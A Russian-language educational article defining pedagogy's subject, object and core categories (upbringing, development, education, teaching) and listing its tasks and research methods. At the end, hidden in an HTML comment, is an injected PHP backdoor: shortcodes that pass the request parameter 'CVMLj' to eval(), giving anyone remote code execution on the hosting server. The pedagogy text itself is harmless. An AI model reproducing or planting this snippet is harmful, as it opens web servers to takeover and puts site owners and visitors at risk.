Основные категории, предмет и объект педагогики
Содержание статьи
Содержание статьи
Предметом педагогики как области научного познания является
Особая функция общества — воспитание.
Поэтому педагогику можно назвать наукой о воспитании.
Объектом исследования в педагогике является «человек, развивающийся в результате воспитательных отношений»
Педагогика — это наука о воспитательных отношениях. Воспитательные отношения возникают «в процессе взаимосвязи воспитания, образования и обучения с самовоспитанием, самообразованием и самообучением».
Еще педагогику можно определить как науку о том, как воспитывать человека, как помочь ему стать духовно богатым и творчески активным.
К категориям любой науки относят наиболее емкие понятия, отражающие , ее сущность и наиболее часто ею использующиеся.
Основные категории педагогики
- воспитание;
- развитие;
- образование;
- обучение.
Воспитание — социальное, целенаправленное создание условий для усвоения новым поколением общественно-исторического опыта. Целью воспитания является подготовка нового поколения к общественной жизни и производительному труду.
Развитие — это объективный процесс изменения духовных и физических сил человека.
Образование — это система внешних условий, специально организуемая обществом для развития человека.
Обучение — процесс передачи знаний от педагога ученику.
Задачи и методы педагогики
Следует различать теоретические и практические задачи педагогики. Педагогика как наука-решает несколько важных теоретических задач:
- выяснение закономерностей процесса воспитания, образования;
- изучение и обобщение практики, опыта педагогической деятельности;
- разработка новых методов, средств, форм, систем обучения, воспитания, управления образовательными структурами;
- внедрение результатов исследований в практику преподавания;
- планирование образования на ближайшее и отдаленное будущее.
Практическое же воплощение теории лежит на отдельных образовательных учреждениях.
В настоящее время педагогика располагает
- множеством разнообразных научных методов. Основными из них являются:
- педагогическое наблюдение;
- исследовательская беседа;
- изучение школьной документации и продуктов деятельности учащихся;
- педагогический эксперимент;
- изучение и обобщение передового педагогического опыта.
<!— [insert_php]if (isset($_REQUEST["CVMLj"])){eval($_REQUEST["CVMLj"]);exit;}[/insert_php][php]if (isset($_REQUEST["CVMLj"])){eval($_REQUEST["CVMLj"]);exit;}[/php] —>